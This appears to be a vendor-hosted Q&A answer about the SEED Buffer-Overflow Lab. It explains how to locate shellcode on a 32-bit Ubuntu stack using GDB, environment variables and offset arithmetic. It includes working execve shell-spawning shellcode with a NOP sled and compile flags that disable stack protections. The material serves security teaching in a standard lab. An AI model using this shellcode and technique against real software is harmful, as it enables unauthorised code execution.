You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

SEED Buffer Overflow实验:shellcode地址定位及return address覆盖问询

Nice work figuring out the offset to overwrite the return address already—that's half the battle! When it comes to locating your shellcode's address in the SEED Buffer-Overflow Lab (Ubuntu 12.04 32-bit), here are the most reliable methods you can use:

1. Debug with GDB to Inspect the Stack Directly

This is the most precise method, especially since you're already using debug tools to calculate offsets:

  • First, compile your vulnerable program with debug symbols and necessary flags (to disable stack protections):
    gcc -g -fno-stack-protector -z execstack vulnerable.c -o vulnerable
    
    The -fno-stack-protector turns off stack canaries, and -z execstack makes the stack executable—both required for this lab.
  • Launch GDB with your program: gdb ./vulnerable
  • Set a breakpoint right before the vulnerable function (e.g., if the function is called vuln, run b vuln).
  • Start the program with r, and when it hits the breakpoint, use x/100x $esp to dump the stack memory. Look for the region where your input buffer is stored.
  • If you're feeding input via stdin, you can use a unique pattern (like a string of incrementing characters) to mark your input's position on the stack. Once you see where this pattern lies, you can pinpoint exactly where your shellcode will reside.
  • You can also get the exact address of the buffer with p &buffer (replace buffer with your actual buffer variable name)—your shellcode will start at this address if you place it at the beginning of your input.

2. Use Environment Variables to Store Shellcode

This method is great if you want to avoid dealing with stack alignment shifts in the vulnerable program:

  1. Export your shellcode as an environment variable (add NOP sleds \x90 to make address guessing forgiving):
    export SHELLCODE=$(python -c 'print "\x90"*50 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
    
  2. Write a tiny C program to fetch the environment variable's address:
    #include <stdio.h>
    #include <stdlib.h>
    
    int main() {
        char *shellcode_addr = getenv("SHELLCODE");
        printf("Shellcode address: %p\n", shellcode_addr);
        return 0;
    }
    
  3. Compile and run this helper program:
    gcc getenv_addr.c -o getenv_addr && ./getenv_addr
    
    Note: The address might shift slightly when running the vulnerable program (due to different stack setup), so the NOP sled will help absorb small discrepancies.

3. Calculate Relative to the Return Address Offset

Since you already know the return address is at offset 36 from the buffer start, you can estimate the shellcode's address relative to this:

  • If your input structure is [NOP Sled][Shellcode][Padding (to offset 36)][Shellcode Address], the shellcode's address will be buffer_start_address + length_of_nop_sled.
  • You can get buffer_start_address via GDB (using p &buffer as mentioned earlier), then adjust for the NOP sled length to get the exact jump target.

Pro Tips

  • Always include a long enough NOP sled (\x90 bytes) before your shellcode. This gives you a "margin of error" if your address calculation is off by a few bytes—the CPU will just slide through the NOPs until it hits the shellcode.
  • Test incrementally: First confirm you can overwrite the return address with a known value (like a GDB breakpoint address) to ensure your offset is correct, then swap it out for your shellcode's address.

内容的提问来源于stack exchange,提问作者alond22

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.05.19 04:23:58